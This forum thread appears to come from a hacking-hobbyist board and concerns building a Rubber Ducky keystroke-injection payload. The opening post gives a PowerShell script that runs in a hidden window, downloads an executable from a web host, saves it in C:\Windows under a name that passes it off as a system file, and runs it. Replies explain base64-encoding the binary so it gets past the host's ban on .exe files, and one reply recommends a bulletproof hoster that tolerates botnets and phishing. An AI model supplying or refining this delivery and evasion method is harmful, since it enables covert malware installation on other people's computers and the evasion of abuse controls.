Jump to content

Recommended Posts

Hi everyone, I'm trying to make a powershell wget and execute payload for the ducky but 000webhosting, my usual go-to webhost, doesn't allow .exe files. I was wondering if there was another hosting site that is free and does allow exes, or if there is some way I can encode the payload or something similar to get around such a block. I thought you might be able to encode it using base 64 in a text file, but I don't know how I'd make the powershell convert it from plaintext to binary using base64.

I was thinking something like this.

Any help is appreciated. Here is my script so far: 

$source = "mysite.com/executables/system32.exe"; $destination = "C:\Windows\system32helper.exe"; Invoke-WebRequest $source -OutFile $destination;
start-process system32.exe

That gets entered into a hidden powershell window. 

Thank you for your time. 

Share this post


Link to post
Share on other sites

Welp, you can always get a vps and host it.

 

Or better yet, instead of everyone looking for hosting for exe files, why not base64 encode it and store it as a txt file.  Download that string, convert back to bytes and then write to drive or memory and execute.

Share this post


Link to post
Share on other sites
On 5/9/2018 at 6:34 PM, Finianb1 said:

That's what I wanted to figure out, was how to do such a base64 encoding and decoding in PowerShell. 

Instead of just giving the answer, the answer is the second answer here for handing binary files.  I tried to find a page to discuss it but everyone seems to be encoding text more than binary out there.

https://stackoverflow.com/questions/42592518/encode-decode-exe-into-base64

 

The premise is this.  You use the "[System.IO.File]::ReadAllBytes(<full path to binary>)" method from .net to read all bytes of the binary which will make a byte array and then use [convert]::ToBase64String() to convert that to base64 and save that string to a text file to host.  You Posh script should download that contents of that text file and decode it from base64 and then you can write back out the bytes to the disk to run from disk as the original file or do whatever else you were going to do with it.

If the file was text like a script you would user [System.IO.File]::ReadAllText(<full path to text file>) and then use "[System.Text.Encoding]::ASCII.GetBytes(<string object>)" to convert to bytes to encode in base64.  If you plan on using the 

 

.NET functions do not take relative paths to files as parameters so you will have to use the full path to the file when reading them in.

"$(Resolve-Path -Path <relative path to file>).path" can be used to convert relative path to full path before passing to the .net functions.

 

 

Share this post


Link to post
Share on other sites

Or, you could just save yourself from the trouble and go with a paid BP hoster that won't ban you on spot. First, always read AUP. Most times, you'll see a looong list of what's not allowed there, incl. botnet, phishing, spam, etc. BUT, my great personal experience with my own hush-hush stuff was Zamanto, one of the very few real hosting providers that does not cares about what u host. Read their Tos, you will laugh like I did.
 

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Loading...

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...